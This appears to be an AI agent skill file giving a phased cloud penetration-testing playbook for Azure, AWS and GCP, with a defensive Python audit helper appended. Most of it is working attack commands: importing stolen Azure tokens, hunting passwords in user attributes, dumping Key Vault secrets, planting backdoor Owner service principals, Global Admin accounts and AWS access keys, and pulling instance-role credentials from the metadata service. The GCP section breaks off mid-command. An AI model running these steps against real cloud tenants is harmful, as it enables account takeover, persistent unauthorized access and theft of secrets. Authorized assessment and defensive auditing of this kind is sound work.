cloud-penetration-testing
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP).
What this skill does
> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

# Cloud Penetration Testing

## Purpose

Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.

## Prerequisites

### Required Tools

```bash
# Azure tools (run these three lines in PowerShell, not bash)
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force

# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install

# GCP CLI: download the installer to a temp dir, review it, then run it
tmpdir="$(mktemp -d)"
trap 'rm -rf "$tmpdir"' EXIT
curl -fsSLo "$tmpdir/google-cloud-sdk-install.sh" https://sdk.cloud.google.com
sed -n '1,160p' "$tmpdir/google-cloud-sdk-install.sh"
bash "$tmpdir/google-cloud-sdk-install.sh"
gcloud init

# Additional tools
pip install scoutsuite pacu
```

Note that the MSOnline and AzureAD modules are deprecated by Microsoft in favour of the Microsoft Graph PowerShell SDK, so the `Get-Msol*` commands below may stop working in tenants where the legacy endpoints have been retired.

### Required Knowledge

- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts

### Required Access

- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement

## Outputs and Deliverables

1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform

## Core Workflow

### Phase 1: Reconnaissance

Gather initial information about the target's cloud presence:

```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/[email protected]&xml=1"

# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"

# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany

# Check IP against cloud providers
cat ips.txt | python3 ip2provider.py
```

### Phase 2: Azure Authentication

Authenticate to Azure environments:

```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount

# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential

# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'

# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json

# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```

### Phase 3: Azure Enumeration

Discover Azure resources and permissions:

```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription

# Current user role assignments
Get-AzRoleAssignment

# List resources
Get-AzResource
Get-AzResourceGroup

# Storage accounts
Get-AzStorageAccount

# Web applications
Get-AzWebApp

# SQL Servers and databases
Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG

# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile

# List all users
Get-MSolUser -All

# List all groups
Get-MSolGroup -All

# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID

# Service Principals
Get-MsolServicePrincipal
```

### Phase 4: Azure Exploitation

Exploit Azure misconfigurations:

```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
    $props = @()
    $user | Get-Member | foreach-object{$props+=$_.Name}
    foreach($prop in $props){
        if($user.$prop -like "*password*"){
            Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
        }
    }
}

# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1

# Extract VM UserData
$vms = Get-AzVM
$vms.UserData

# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```

### Phase 5: Azure Persistence

Establish persistence in Azure:

```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)

# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId

# Login as service principal
$cred = Get-Credential  # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal

# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```

### Phase 6: AWS Authentication

Authenticate to AWS environments:

```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format

# Use specific profile
aws configure --profile target

# Test credentials
aws sts get-caller-identity
```

### Phase 7: AWS Enumeration

Discover AWS resources:

```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles

# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir

# EC2 Instances
aws ec2 describe-instances

# RDS Databases
aws rds describe-db-instances --region us-east-1

# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>

# EKS Clusters
aws eks list-clusters --region us-east-1

# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```

### Phase 8: AWS Exploitation

Exploit AWS misconfigurations:

```bash
# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible

# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'

# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# IMDSv2 access
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```

### Phase 9: AWS Persistence

Establish persistence in AWS:

```bash
# List existing access keys
aws iam list-access-keys --user-name <username>

# Create backdoor access key
aws iam create-access-key --user-name <username>

# Get all EC2 public IPs
for region in $(cat regions.txt); do
    aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done
```

### Phase 10: GCP Enumeration

Discover GCP resources:

```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list

# Account information
gcloud config list
gcloud organizations list
gcloud projects list

# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>

# Enabled services
gcloud services list

# Source code repos
gcloud source repos list
gcloud s
```
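As an added example that is not part of the original skill, the helpers below turn two of the Phase 8 checks into offline audits of saved CLI output: the snapshot `restore` attribute whose value `"all"` marks a manual RDS snapshot as public, and the instance `MetadataOptions.HttpTokens` setting that decides whether the unauthenticated IMDSv1 read still works. The JSON documents are hand-constructed to mirror the shape of `describe-db-snapshot-attributes` and `describe-instances` output; the identifiers in them are placeholders.

```python
import json

# Constructed sample documents shaped like the JSON printed by
# `aws rds describe-db-snapshot-attributes` and `aws ec2 describe-instances`.
# They are hand-written for this example, not real account data.
SNAPSHOT_ATTRS = json.loads("""
{"DBSnapshotAttributesResult": {
  "DBSnapshotIdentifier": "prod-db-final",
  "DBSnapshotAttributes": [
    {"AttributeName": "restore", "AttributeValues": ["all"]}
  ]}}
""")

DESCRIBE_INSTANCES = json.loads("""
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0aaa", "MetadataOptions":
     {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
  {"InstanceId": "i-0bbb", "MetadataOptions":
     {"HttpEndpoint": "enabled", "HttpTokens": "required"}},
  {"InstanceId": "i-0ccc", "MetadataOptions":
     {"HttpEndpoint": "disabled", "HttpTokens": "optional"}}
]}]}
""")


def snapshot_restore_grants(attrs_doc):
    """Account ids the snapshot's 'restore' attribute is shared with.
    The literal "all" means any AWS account may copy or restore it."""
    result = attrs_doc["DBSnapshotAttributesResult"]
    for attr in result.get("DBSnapshotAttributes", []):
        if attr.get("AttributeName") == "restore":
            return list(attr.get("AttributeValues", []))
    return []


def is_public_snapshot(attrs_doc):
    return "all" in snapshot_restore_grants(attrs_doc)


def imdsv1_instances(describe_doc):
    """Instance ids whose metadata endpoint is enabled but does not require
    the IMDSv2 session token, so a plain unauthenticated GET of the
    security-credentials path still returns the instance role's keys."""
    weak = []
    for reservation in describe_doc.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "enabled" and opts.get("HttpTokens") != "required":
                weak.append(inst["InstanceId"])
    return weak
```

Run the same functions over real output saved with `aws ... --output json > file.json` to list snapshots to un-share and instances whose metadata options should be switched to `HttpTokens=required`.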